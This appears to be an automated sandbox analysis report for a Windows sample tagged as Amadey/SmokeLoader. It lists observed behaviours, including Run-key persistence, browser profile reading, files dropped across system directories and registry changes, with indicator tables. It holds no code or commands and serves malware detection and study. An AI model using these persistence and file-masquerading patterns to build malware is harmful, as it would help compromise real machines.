Analysis Overview
SHA256
123d28c8739c51bc1fb2829176f21bd72ef8112f168b85223855ff73aa5b80ff
Threat Level: Likely malicious
The file 2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader was found to be: Likely malicious.
Malicious Activity Summary
Contacts a large (1018) amount of remote hosts
Contacts a large (896) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-04 12:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-04 12:07
Reported
2025-07-04 12:09
Platform
win11-20250502-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Contacts a large (896) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.22000.376_none_d180c9ec46d962eb\r\splwow64.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..ces-workspacebroker_31bf3856ad364e35_10.0.22000.282_none_8a68951ea6251dba\f\wkspbroker.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchProtocolHost.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_curl_31bf3856ad364e35_10.0.22000.434_none_79ca17dba25cd0c9\f\curl.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-fsavailux_31bf3856ad364e35_10.0.22000.1_none_010c2089229afa0b\fsavailux.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\r\ScreenClippingHost.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.22000.120_none_1e850fa96c804e78\XBox.TCUI.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-appx-deployment-server_31bf3856ad364e35_10.0.22000.318_none_5cc755143bc62566\CustomInstallExec.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-setupcl_31bf3856ad364e35_10.0.22000.1_none_aef2a379f0110144\setupcl.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-controlpanel_31bf3856ad364e35_10.0.22000.1_none_35b70fce5fba56f3\MultiDigiMon.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-u..te-orchestratorcore_31bf3856ad364e35_10.0.22000.282_none_81f8a77609cf735a\r\MoUsoCoreWorker.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-u..teelevatedinstaller_31bf3856ad364e35_10.0.22000.1_none_dbd26f990ff88a48\WindowsUpdateElevatedInstaller.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\msil_hyperv-ux-ui-vmimport_31bf3856ad364e35_10.0.22000.1_none_7b6044ae48f3e66a\VMImport.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-com-complus-ui_31bf3856ad364e35_10.0.22000.1_none_11400bad816266c9\dcomcnfg.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_dbc66c84afafb5a2\f\printui.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-client-li..m-service-migration_31bf3856ad364e35_10.0.22000.120_none_9268b7169b04c4a6\ClipUp.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-onecore-i..atedusermode-kernel_31bf3856ad364e35_10.0.22000.71_none_c9fbc04eb075be36\f\securekernel.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-grouppolicy-script_31bf3856ad364e35_10.0.22000.1_none_bb5ad6287475565d\gpscript.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-shell-shellappruntime_31bf3856ad364e35_10.0.22000.120_none_0e11f85980658aa8\ShellAppRuntime.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\x86_regsvcs_b03f5f7f11d50a3a_10.0.22000.1_none_86f921f526968cd7\RegSvcs.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_288258558\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchFilterHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchProtocolHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-compute-cont..utionservice-shared_31bf3856ad364e35_10.0.22000.1_none_ac1383f732e955f2\CExecSvc.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_90fb210207715818\f\Taskmgr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-coresystem-wpr_31bf3856ad364e35_10.0.22000.1_none_b8730bce9cba86d4\wpr.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-driverquery_31bf3856ad364e35_10.0.22000.1_none_ec66691b99d2b34c\driverquery.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.22000.282_none_c161005c63dc5d29\Windows.Media.BackgroundPlayback.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_installutil_b03f5f7f11d50a3a_10.0.22000.1_none_d094352fcb43807d\InstallUtil.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.22000.469_none_40856ba085a100c4\BioIso.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\r\SearchIndexer.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFaultSecure.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\r\RMActivate.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.282_none_5faf7b34bce42c4c\SearchProtocolHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_10.0.22000.282_none_d037578ed2162e06\f\sdbinst.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_90fb210207715818\f\LaunchTM.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_a6b2722d9eed2eed\f\fixmapi.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-setx_31bf3856ad364e35_10.0.22000.1_none_02ba73751dd9765e\setx.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-regini_31bf3856ad364e35_10.0.22000.1_none_6cee8466f2fab8e9\regini.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-capturepicker.appxmain_31bf3856ad364e35_10.0.22000.120_none_3023ad156f648a5a\f\CapturePicker.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-optionalfeatures_31bf3856ad364e35_10.0.22000.1_none_bcaa97eff2780373\OptionalFeatures.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-takeown_31bf3856ad364e35_10.0.22000.1_none_502f03701a672d6b\takeown.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_a92436e98f43ccd7\tree.com_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-p..structureexecutable_31bf3856ad364e35_10.0.22000.1_none_58a0c8778f3217ee\unlodctr.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-verclsid_31bf3856ad364e35_10.0.22000.1_none_1c7f192e4c9e218b\verclsid.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\f\wifitask.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\RecEnv.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-appmanagement-uevagent_31bf3856ad364e35_10.0.22000.100_none_f82676266a17f522\UevTemplateConfigItemGenerator.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-w..ter-cimprovider-exe_31bf3856ad364e35_10.0.22000.1_none_c3e1e602251fe636\Register-CimProvider.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\x86_wcf-m_sm_cfg_ins_exe_31bf3856ad364e35_10.0.22000.1_none_fa465e3269918ca5\SMConfigInstaller.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\f\SpatialAudioLicenseSrv.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.22000.1_none_4b3b75ad087c3772\eventvwr.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..cymanagerbrokerhost_31bf3856ad364e35_10.0.22000.1_none_d5126d2e75032b40\EASPolicyManagerBrokerHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\SysResetErr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-virtualdiskapilibrary_31bf3856ad364e35_10.0.22000.65_none_cf76e66c2463ea3d\convertvhd.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.22000.1_none_fdc8d4cbc9bb5f92\ctfmon.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smartscreen_31bf3856ad364e35_10.0.22000.65_none_9f7612893c144c09\f\smartscreen.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31190331" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "749711625" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961044410459447" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
